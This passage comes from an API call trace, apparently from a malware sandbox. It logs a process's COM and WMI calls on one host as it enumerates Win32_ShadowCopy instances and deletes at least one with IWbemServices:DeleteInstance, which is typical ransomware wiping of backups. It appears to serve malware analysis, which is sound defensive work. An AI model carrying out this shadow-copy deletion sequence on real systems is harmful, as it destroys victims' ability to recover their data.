ppvObject=0x1c90cfd0*=0x0) returned 0x80004002 [0124.730] WbemDefPath:IUnknown:AddRef (This=0x1be52c50) returned 0x3 [0124.731] CoGetContextToken (in: pToken=0x1c90cc20 | out: pToken=0x1c90cc20) returned 0x0 [0124.731] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be52c50, riid=0x7fef2d6d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90cbe0 | out: ppvObject=0x1c90cbe0*=0x1b9369e0) returned 0x0 [0124.731] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x1b9369e0, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c90cc10 | out: pCid=0x1c90cc10*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0124.731] WbemDefPath:IUnknown:Release (This=0x1b9369e0) returned 0x3 [0124.731] CoGetContextToken (in: pToken=0x1c90cbf0 | out: pToken=0x1c90cbf0) returned 0x0 [0124.731] WbemDefPath:IUnknown:AddRef (This=0x1be52c50) returned 0x4 [0124.731] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be52c50, riid=0x7fef2d6d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90cd08 | out: ppvObject=0x1c90cd08*=0x0) returned 0x80004002 [0124.731] WbemDefPath:IUnknown:Release (This=0x1be52c50) returned 0x3 [0124.732] WbemDefPath:IUnknown:Release (This=0x1be52c50) returned 0x2 [0124.732] WbemDefPath:IUnknown:Release (This=0x1be51e60) returned 0x0 [0124.732] WbemDefPath:IUnknown:Release (This=0x1be52c50) returned 0x1 [0124.732] CoGetContextToken (in: pToken=0x1c90d920 | out: pToken=0x1c90d920) returned 0x0 [0124.732] CoGetContextToken (in: pToken=0x1c90d860 | out: pToken=0x1c90d860) returned 0x0 [0124.732] WbemDefPath:IUnknown:AddRef (This=0x1be52c50) returned 0x2 [0124.732] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be52c50, riid=0x1c90d9a0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c90d980 | out: ppvObject=0x1c90d980*=0x1be52c50) returned 0x0 [0124.732] WbemDefPath:IUnknown:Release (This=0x1be52c50) returned 0x2 [0124.733] WbemDefPath:IUnknown:Release (This=0x1be52c50) returned 0x1 [0124.733] CoGetContextToken (in: pToken=0x1c90daa0 | out: pToken=0x1c90daa0) returned 0x0 [0124.733] CoGetContextToken (in: pToken=0x1c90d9e0 | out: pToken=0x1c90d9e0) returned 0x0 [0124.733] WbemDefPath:IUnknown:AddRef (This=0x1be52c50) returned 0x2 [0124.733] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be52c50, riid=0x1c90db20*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c90db00 | out: ppvObject=0x1c90db00*=0x1be52c50) returned 0x0 [0124.733] WbemDefPath:IUnknown:Release (This=0x1be52c50) returned 0x2 [0124.733] WbemDefPath:IUnknown:AddRef (This=0x1be52c50) returned 0x3 [0124.733] WbemDefPath:IWbemPath:SetText (This=0x1be52c50, uMode=0x4, pszPath="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{E1ADED26-A00D-489F-A2D1-21A5F0FDF97C}\"") returned 0x0 [0124.734] WbemDefPath:IUnknown:Release (This=0x1be52c50) returned 0x2 [0124.734] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be31390, puCount=0x1c90dd60 | out: puCount=0x1c90dd60*=0x2) returned 0x0 [0124.734] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90dd60*=0x0, pszText=0x0 | out: puBuffLength=0x1c90dd60*=0x17, pszText=0x0) returned 0x0 [0124.734] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90dd60*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c90dd60*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0124.734] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be31390, puCount=0x1c90d800 | out: puCount=0x1c90d800*=0x2) returned 0x0 [0124.734] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d800*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d800*=0x17, pszText=0x0) returned 0x0 [0124.734] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d800*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c90d800*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0124.734] IWbemClassObject:Get (in: This=0x1be55c30, wszName="__NAMESPACE", lFlags=0, pVal=0x1c90d7f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d7ec*=0, plFlavor=0x1c90d7e8*=0 | out: pVal=0x1c90d7f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x1c90d7ec*=8, plFlavor=0x1c90d7e8*=64) returned 0x0 [0124.734] SysStringLen (param_1="root\\cimv2") returned 0xa [0124.734] IWbemClassObject:Get (in: This=0x1be55c30, wszName="__NAMESPACE", lFlags=0, pVal=0x1c90d800*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d7fc*=8, plFlavor=0x1c90d7f8*=64 | out: pVal=0x1c90d800*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x1c90d7fc*=8, plFlavor=0x1c90d7f8*=64) returned 0x0 [0124.735] SysStringLen (param_1="root\\cimv2") returned 0xa [0124.735] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be31390, puCount=0x1c90d800 | out: puCount=0x1c90d800*=0x2) returned 0x0 [0124.735] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d800*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d800*=0x17, pszText=0x0) returned 0x0 [0124.735] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d800*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c90d800*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0124.735] IWbemClassObject:Get (in: This=0x1be55c30, wszName="__CLASS", lFlags=0, pVal=0x1c90d7f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d7ec*=0, plFlavor=0x1c90d7e8*=0 | out: pVal=0x1c90d7f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ShadowCopy", varVal2=0x0), pType=0x1c90d7ec*=8, plFlavor=0x1c90d7e8*=64) returned 0x0 [0124.735] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0124.735] IWbemClassObject:Get (in: This=0x1be55c30, wszName="__CLASS", lFlags=0, pVal=0x1c90d800*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d7fc*=8, plFlavor=0x1c90d7f8*=64 | out: pVal=0x1c90d800*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ShadowCopy", varVal2=0x0), pType=0x1c90d7fc*=8, plFlavor=0x1c90d7f8*=64) returned 0x0 [0124.735] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0124.736] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be52c50, puCount=0x1c90d500 | out: puCount=0x1c90d500*=0x2) returned 0x0 [0124.736] WbemDefPath:IWbemPath:GetText (in: This=0x1be52c50, lFlags=4, puBuffLength=0x1c90d500*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d500*=0x54, pszText=0x0) returned 0x0 [0124.736] WbemDefPath:IWbemPath:GetText (in: This=0x1be52c50, lFlags=4, puBuffLength=0x1c90d500*=0x54, pszText="00000000000000000000000000000000000000000000000000000000000000000000000000000000000" | out: puBuffLength=0x1c90d500*=0x54, pszText="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{E1ADED26-A00D-489F-A2D1-21A5F0FDF97C}\"") returned 0x0 [0124.736] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be31390, puCount=0x1c90d450 | out: puCount=0x1c90d450*=0x2) returned 0x0 [0124.736] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d450*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d450*=0x17, pszText=0x0) returned 0x0 [0124.736] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d450*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c90d450*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0124.736] CoGetContextToken (in: pToken=0x1c90d2e0 | out: pToken=0x1c90d2e0) returned 0x0 [0124.736] WbemLocator:IUnknown:AddRef (This=0x1b92e6f0) returned 0x3 [0124.736] WbemLocator:IUnknown:QueryInterface (in: This=0x1b92e6f0, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90ceb0 | out: ppvObject=0x1c90ceb0*=0x1b92e6f0) returned 0x0 [0124.736] WbemLocator:IUnknown:Release (This=0x1b92e6f0) returned 0x3 [0124.737] WbemLocator:IUnknown:Release (This=0x1b92e6f0) returned 0x2 [0124.737] IWbemClassObject:Get (in: This=0x1be55c30, wszName="__GENUS", lFlags=0, pVal=0x1c90d440*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d43c*=0, plFlavor=0x1c90d438*=0 | out: pVal=0x1c90d440*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c90d43c*=3, plFlavor=0x1c90d438*=64) returned 0x0 [0124.737] WbemDefPath:IWbemPath:GetText (in: This=0x1be52c50, lFlags=2, puBuffLength=0x1c90d510*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d510*=0x3d, pszText=0x0) returned 0x0 [0124.737] WbemDefPath:IWbemPath:GetText (in: This=0x1be52c50, lFlags=2, puBuffLength=0x1c90d510*=0x3d, pszText="000000000000000000000000000000000000000000000000000000000000" | out: puBuffLength=0x1c90d510*=0x3d, pszText="Win32_ShadowCopy.ID=\"{E1ADED26-A00D-489F-A2D1-21A5F0FDF97C}\"") returned 0x0 [0124.737] IWbemServices:DeleteInstance (in: This=0x1be444f8, strObjectPath="Win32_ShadowCopy.ID=\"{E1ADED26-A00D-489F-A2D1-21A5F0FDF97C}\"", lFlags=0, pCtx=0x0, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0127.018] CoTaskMemAlloc (cb=0x8) returned 0x16a900 [0127.018] IEnumWbemClassObject:Next (in: This=0x1be44788, lTimeout=-1, uCount=0x1, apObjects=0x16a900, puReturned=0x1c90de18 | out: apObjects=0x16a900*=0x1be562d0, puReturned=0x1c90de18*=0x1) returned 0x0 [0127.019] IUnknown:QueryInterface (in: This=0x1be562d0, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90d140 | out: ppvObject=0x1c90d140*=0x1be562d0) returned 0x0 [0127.020] IUnknown:QueryInterface (in: This=0x1be562d0, riid=0x7fef2d6d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c90d1c0 | out: ppvObject=0x1c90d1c0*=0x0) returned 0x80004002 [0127.020] IUnknown:QueryInterface (in: This=0x1be562d0, riid=0x7fef2d6d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c90cf58 | out: ppvObject=0x1c90cf58*=0x0) returned 0x80004002 [0127.020] IUnknown:AddRef (This=0x1be562d0) returned 0x3 [0127.020] CoGetContextToken (in: pToken=0x1c90ce10 | out: pToken=0x1c90ce10) returned 0x0 [0127.020] IUnknown:QueryInterface (in: This=0x1be562d0, riid=0x7fef2d6d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90cdd0 | out: ppvObject=0x1c90cdd0*=0x1be562d8) returned 0x0 [0127.020] IMarshal:GetUnmarshalClass (in: This=0x1be562d8, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c90ce00 | out: pCid=0x1c90ce00*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0127.020] IUnknown:Release (This=0x1be562d8) returned 0x3 [0127.020] CoGetContextToken (in: pToken=0x1c90cde0 | out: pToken=0x1c90cde0) returned 0x0 [0127.020] IUnknown:AddRef (This=0x1be562d0) returned 0x4 [0127.020] IUnknown:QueryInterface (in: This=0x1be562d0, riid=0x7fef2d6d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90cef8 | out: ppvObject=0x1c90cef8*=0x0) returned 0x80004002 [0127.021] IUnknown:Release (This=0x1be562d0) returned 0x3 [0127.021] IUnknown:Release (This=0x1be562d0) returned 0x2 [0127.021] CoGetContextToken (in: pToken=0x1c90d2a0 | out: pToken=0x1c90d2a0) returned 0x0 [0127.021] CoGetContextToken (in: pToken=0x1c90d1e0 | out: pToken=0x1c90d1e0) returned 0x0 [0127.021] IUnknown:AddRef (This=0x1be562d0) returned 0x3 [0127.021] IUnknown:QueryInterface (in: This=0x1be562d0, riid=0x1c90d320*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x1c90d300 | out: ppvObject=0x1c90d300*=0x1be562d0) returned 0x0 [0127.021] IUnknown:Release (This=0x1be562d0) returned 0x3 [0127.021] IUnknown:Release (This=0x1be562d0) returned 0x2 [0127.021] IUnknown:Release (This=0x1be562d0) returned 0x1 [0127.021] CoTaskMemFree (pv=0x16a900) [0127.021] CoGetContextToken (in: pToken=0x1c90dc20 | out: pToken=0x1c90dc20) returned 0x0 [0127.021] IUnknown:AddRef (This=0x1be562d0) returned 0x2 [0127.022] IWbemClassObject:Get (in: This=0x1be562d0, wszName="__GENUS", lFlags=0, pVal=0x1c90dd90*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90dd8c*=0, plFlavor=0x1c90dd88*=0 | out: pVal=0x1c90dd90*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c90dd8c*=3, plFlavor=0x1c90dd88*=64) returned 0x0 [0127.022] IWbemClassObject:Get (in: This=0x1be562d0, wszName="__PATH", lFlags=0, pVal=0x1c90dd30*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90dd2c*=0, plFlavor=0x1c90dd28*=0 | out: pVal=0x1c90dd30*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{05121166-67F2-4EA9-83D8-EDC08F680DA7}\"", varVal2=0x0), pType=0x1c90dd2c*=8, plFlavor=0x1c90dd28*=64) returned 0x0 [0127.022] SysStringLen (param_1="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{05121166-67F2-4EA9-83D8-EDC08F680DA7}\"") returned 0x53 [0127.022] CoGetObjectContext (in: riid=0x1c90dcc8*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c90dcc0 | out: ppv=0x1c90dcc0*=0x142498) returned 0x0 [0127.022] IComThreadingInfo:GetCurrentApartmentType (in: This=0x142498, pAptType=0x1c90dce0 | out: pAptType=0x1c90dce0*=1) returned 0x0 [0127.022] IUnknown:QueryInterface (in: This=0x142498, riid=0x30db210*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c90dde8 | out: ppvObject=0x1c90dde8*=0x0) returned 0x80004002 [0127.022] IUnknown:Release (This=0x142498) returned 0x1 [0127.023] CoGetClassObject (in: rclsid=0x1b90a7f8*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef2d6d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c90d350 | out: ppv=0x1c90d350*=0x1be51f20) returned 0x0 [0127.023] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be51f20, riid=0x7fef2d6d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c90d060 | out: ppvObject=0x1c90d060*=0x0) returned 0x80004002 [0127.023] WbemDefPath:IClassFactory:CreateInstance (in: This=0x1be51f20, pUnkOuter=0x0, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90d048 | out: ppvObject=0x1c90d048*=0x1be52d10) returned 0x0 [0127.024] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be52d10, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90cf50 | out: ppvObject=0x1c90cf50*=0x1be52d10) returned 0x0 [0127.024] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be52d10, riid=0x7fef2d6d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c90cfd0 | out: ppvObject=0x1c90cfd0*=0x0) returned 0x80004002 [0127.024] WbemDefPath:IUnknown:AddRef (This=0x1be52d10) returned 0x3 [0127.024] CoGetContextToken (in: pToken=0x1c90cc20 | out: pToken=0x1c90cc20) returned 0x0 [0127.024] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be52d10, riid=0x7fef2d6d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90cbe0 | out: ppvObject=0x1c90cbe0*=0x1b936ae0) returned 0x0 [0127.024] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x1b936ae0, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c90cc10 | out: pCid=0x1c90cc10*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0127.024] WbemDefPath:IUnknown:Release (This=0x1b936ae0) returned 0x3 [0127.024] CoGetContextToken (in: pToken=0x1c90cbf0 | out: pToken=0x1c90cbf0) returned 0x0 [0127.024] WbemDefPath:IUnknown:AddRef (This=0x1be52d10) returned 0x4 [0127.024] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be52d10, riid=0x7fef2d6d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90cd08 | out: ppvObject=0x1c90cd08*=0x0) returned 0x80004002 [0127.025] WbemDefPath:IUnknown:Release (This=0x1be52d10) returned 0x3 [0127.025] WbemDefPath:IUnknown:Release (This=0x1be52d10) returned 0x2 [0127.025] WbemDefPath:IUnknown:Release (This=0x1be51f20) returned 0x0 [0127.025] WbemDefPath:IUnknown:Release (This=0x1be52d10) returned 0x1 [0127.025] CoGetContextToken (in: pToken=0x1c90d920 | out: pToken=0x1c90d920) returned 0x0 [0127.025] CoGetContextToken (in: pToken=0x1c90d860 | out: pToken=0x1c90d860) returned 0x0 [0127.025] WbemDefPath:IUnknown:AddRef (This=0x1be52d10) returned 0x2 [0127.025] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be52d10, riid=0x1c90d9a0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c90d980 | out: ppvObject=0x1c90d980*=0x1be52d10) returned 0x0 [0127.025] WbemDefPath:IUnknown:Release (This=0x1be52d10) returned 0x2 [0127.025] WbemDefPath:IUnknown:Release (This=0x1be52d10) returned 0x1 [0127.026] CoGetContextToken (in: pToken=0x1c90daa0 | out: pToken=0x1c90daa0) returned 0x0 [0127.026] CoGetContextToken (in: pToken=0x1c90d9e0 | out: pToken=0x1c90d9e0) returned 0x0 [0127.026] WbemDefPath:IUnknown:AddRef (This=0x1be52d10) returned 0x2 [0127.026] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be52d10, riid=0x1c90db20*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c90db00 | out: ppvObject=0x1c90db00*=0x1be52d10) returned 0x0 [0127.026] WbemDefPath:IUnknown:Release (This=0x1be52d10) returned 0x2 [0127.026] WbemDefPath:IUnknown:AddRef (This=0x1be52d10) returned 0x3 [0127.026] WbemDefPath:IWbemPath:SetText (This=0x1be52d10, uMode=0x4, pszPath="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{05121166-67F2-4EA9-83D8-EDC08F680DA7}\"") returned 0x0 [0127.026] WbemDefPath:IUnknown:Release (This=0x1be52d10) returned 0x2 [0127.026] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be31390, puCount=0x1c90dd60 | out: puCount=0x1c90dd60*=0x2) returned 0x0 [0127.026] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90dd60*=0x0, pszText=0x0 | out: puBuffLength=0x1c90dd60*=0x17, pszText=0x0) returned 0x0 [0127.027] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90dd60*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c90dd60*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0127.027] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be31390, puCount=0x1c90d800 | out: puCount=0x1c90d800*=0x2) returned 0x0 [0127.027] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d800*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d800*=0x17, pszText=0x0) returned 0x0 [0127.027] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d800*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c90d800*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0127.027] IWbemClassObject:Get (in: This=0x1be562d0, wszName="__NAMESPACE", lFlags=0, pVal=0x1c90d7f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d7ec*=0, plFlavor=0x1c90d7e8*=0 | out: pVal=0x1c90d7f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x1c90d7ec*=8, plFlavor=0x1c90d7e8*=64) returned 0x0 [0127.027] SysStringLen (param_1="root\\cimv2") returned 0xa [0127.027] IWbemClassObject:Get (in: This=0x1be562d0, wszName="__NAMESPACE", lFlags=0, pVal=0x1c90d800*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d7fc*=8, plFlavor=0x1c90d7f8*=64 | out: pVal=0x1c90d800*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x1c90d7fc*=8, plFlavor=0x1c90d7f8*=64) returned 0x0 [0127.027] SysStringLen (param_1="root\\cimv2") returned 0xa [0127.027] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be31390, puCount=0x1c90d800 | out: puCount=0x1c90d800*=0x2) returned 0x0 [0127.027] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d800*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d800*=0x17, pszText=0x0) returned 0x0 [0127.027] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d800*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c90d800*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0127.027] IWbemClassObject:Get (in: This=0x1be562d0, wszName="__CLASS", lFlags=0, pVal=0x1c90d7f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d7ec*=0, plFlavor=0x1c90d7e8*=0 | out: pVal=0x1c90d7f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ShadowCopy", varVal2=0x0), pType=0x1c90d7ec*=8, plFlavor=0x1c90d7e8*=64) returned 0x0 [0127.028] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0127.028] IWbemClassObject:Get (in: This=0x1be562d0, wszName="__CLASS", lFlags=0, pVal=0x1c90d800*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d7fc*=8, plFlavor=0x1c90d7f8*=64 | out: pVal=0x1c90d800*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ShadowCopy", varVal2=0x0), pType=0x1c90d7fc*=8, plFlavor=0x1c90d7f8*=64) returned 0x0 [0127.028] SysStringLen 